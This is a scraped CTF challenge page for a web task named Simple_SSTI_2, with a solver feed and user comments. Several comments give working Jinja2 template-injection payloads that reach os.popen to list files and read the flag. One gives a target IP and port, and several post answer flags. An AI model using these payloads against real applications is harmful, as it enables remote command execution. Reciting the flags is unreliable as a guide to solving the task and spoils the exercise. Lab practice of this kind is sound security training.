Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16470
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
shu-jia 攻破了该题 1天前
avaclaire 攻破了该题 2天前
cha8e1 攻破了该题 3天前
yehlg 攻破了该题 4天前
edisonya 攻破了该题 5天前
finsh 攻破了该题 5天前
pangjinqi 攻破了该题 6天前
mmhhdm 攻破了该题 6天前
wujita01 攻破了该题 6天前
Hackerchen 攻破了该题 7天前
影人sha 攻破了该题 7天前
drameet 攻破了该题 7天前
Hoshisyy 攻破了该题 11天前
SuperFan 攻破了该题 11天前
ikunqq 攻破了该题 12天前
十里故清云 攻破了该题 13天前
0n1y 攻破了该题 14天前
bugku2026 攻破了该题 15天前
kr2yh 攻破了该题 15天前
评论
是呆瓜蔚呀 2年前
举报
flag{f231bce175908e8fec554031a6232a55}
htttpss 2年前
举报
flag{c75b03620c73371a0e8f249354e0bd57} ?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}即可
3166235571 2年前
举报
是这个flag{561f38d2a44d42ca8847575a2e144b2b} so easy
2280443298 2年前
举报
{{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
zhenbuhuiweb 2年前
举报
flag{d15e0ca95ddb50b992109b24c82cfe5a}
ssln 2年前
举报
114.67.175.224:12792/?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 看不懂,应该是什么固定格式,修改“ls”即可执行命令
210470qq 2年前
举报
flag{43b52fa732d6f8ccbfacea9e989ac07b}
songci 2年前
举报
ssti模板注入,尝试获取OS module进行命令执行或文件读取,使用init.globals来看看有没有os module或者其他的可以读写文件的,爆破获取300存在:{{"".__class__.__mro__[1].__subclasses__()[300].__init__.__globals__}},进行命令执行获取flag:?flag={{""
Mirabelle 2年前
举报
?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}; ?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
ZeronKR1212 2年前
举报
怎么做啊,哥哥们